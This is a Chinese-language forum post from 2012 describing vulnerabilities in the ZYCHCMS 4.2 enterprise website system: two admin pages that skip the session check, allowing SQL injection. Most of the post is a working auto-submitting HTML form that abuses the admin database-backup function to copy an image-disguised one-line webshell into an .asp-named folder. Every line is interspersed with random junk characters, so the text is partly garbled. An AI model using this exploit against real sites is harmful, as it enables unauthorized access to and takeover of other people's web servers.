$ ~/ v2 C2 V. O# T, I1 K& Z7 K0 Z. T$ z" j2 n$ ?
( M$ H) q/ }5 o
1 T. B# J7 ]# g1 n! S. O+ I影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
6 R' B* V0 b/ E) a ①SQL注射漏洞
' f" n) J1 V9 ]$ v; u: Z 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp8 |3 K1 a' W/ j7 m; H
漏洞原因:未过滤1 @( L2 l$ t9 E& S3 B0 F9 A: u
漏洞代码:
: R" \9 m; Y* h; ?8 B6 h3 v3 a4 A 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。% T3 j8 y: e3 `+ d
修复方法:在文件开头加入代码( R5 c$ i6 {# l9 e. m7 I
7 H$ ]5 u6 J* e3 ]* I1 u6 i3 S+ [. g6 S |0 Q
②后台拿WBSHELL2 k1 \; P. v$ R: {: p; n! M' h
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
3 R3 |+ D! @0 p9 W8 P 这里在网上找了一个,改了下,将就着用。# i& s& I2 t1 a
以下是代码本地提交代码7 u: t( s3 `! [0 h$ f& V
# i8 W. z: X+ J" j2 l7 G4 {" R: c
9 @, O3 F v2 a! x3 z' `/ V<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
+ W8 V- l9 o/ z( H1 k" Z% z <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>1 d' ^9 ~+ f" F, C5 q0 `: P
<tr>
) D$ u7 h8 ^; P4 K <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>) N# u5 k) k6 W3 H/ d0 g' L6 N( r
</tr>
9 P# q# F1 C- _' E* G <tr>& T3 t" X; E) E% C* n2 m) U
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
: V+ W# Q; N: }, X7 ] </span>
+ f$ y; d# X# T' k3 Y9 t! r <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
/ W( b1 {( b* |3 X4 E0 v. T% G <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >4 m% ^4 t9 p+ Z5 N1 o: A. k
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
4 j- f; H) P( L( o+ M! C8 n <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d, c8 t# f/ G' U/ t: I1 H
<div align=”left”>' C# f" r: @: W( U1 a8 F! |8 ~
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
- a- w7 d/ m+ K* `1 z <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
- w4 Y" T+ Q7 A8 ^0 g# H8 { <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />: H! w, P# @, o. K) a
</div></td>/ V: H5 [7 v4 e7 ~1 D( d6 \( {
</tr>
& @% R h! d, @' C* o1 O <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
" U6 Z, t- n+ y <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>! B+ Y$ u5 r+ t. @% c9 o2 L) }# N2 B
<td class=”td”><div align=”left”>
+ Z- ]' a. ~4 B- L8 O3 I <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
5 q- F- L2 X: r3 O# m [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>5 v" U1 l" p; W* f+ C7 p9 C/ c
</tr>! f& v3 \" g2 x" c- U. l$ i
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>7 S! T2 L1 S u" k+ A4 g! Y
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td> {3 ~' F1 S) I8 t1 N
<td class=”td”><div align=”left”>
* P% P! J- `" x <input type=”submit” value=”确定备份” class=”btn”
- h+ g+ d. i, U# N1 c: Y </div></td>
9 z" G, F/ b/ h1 T6 w7 w </tr>
3 W/ Q+ ?' w9 S) R; y </table></td></tr></form>* Y; V1 G9 y! w, c6 b% P; t
</table>
2 W* x% A" |0 q+ F </td>) j6 X9 S% a, k" q6 D% U
</tr>
) I4 f; H$ n4 h3 B" N8 V </table>9 B" ^# W' _- R9 K. L
<script>; P: _: L; R# B- B: T
document.all.add.submit();
& c# J) @- ^: X3 t </script>
3 O8 T( Q; F/ ?0 r
- T# m' w+ d3 b5 s( E
6 C, ?- H9 Z- @+ t
" [ H' R( @$ Q( J6 @9 J3 }+ N- C. D0 ~* g
" |* Y& u4 {. ?
; q7 l6 a2 b. }, I1 K8 K! l( q' _' ^
2 U) q; ?; p. W; T! ?6 z- c. i: D
; ]# l3 C' p5 | |
发表于 2012-9-10 21:09:51
收藏
分享
支持
反对